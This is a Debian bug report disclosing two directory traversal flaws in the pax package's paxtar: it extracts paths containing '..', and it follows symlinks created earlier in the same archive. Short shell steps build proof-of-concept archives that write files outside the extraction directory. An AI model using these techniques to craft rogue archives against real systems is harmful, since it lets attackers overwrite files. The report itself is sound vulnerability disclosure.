Package: pax
Version: 1:20140703-2
Tags: security
paxtar is susceptible to directory traversal vulnerabilities. They can
be exploited by a rogue archive to write files outside the current
directory.
1. paxtar will extract files with .. components in names.
For example, let's create a sample archive:
echo hello > ../file
paxtar cvf test.tar ../file
rm ../file
and then test it:
paxtar xvf test.tar
This will create a file "../file".
2. While extracting an archive, it will extract symlinks and then follow
them if they are referenced in further entries.
For example, let's create a sample archive:
ln -s /tmp dir
paxtar cvf test.tar dir
rm dir
mkdir dir
echo hello > dir/file
paxtar rvf test.tar dir/file
rm -r dir
and then test it:
paxtar xvf test.tar
This will create a symlink "dir" in the current directory and a file
"/tmp/file".
--
Alexander Cherepanov
--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
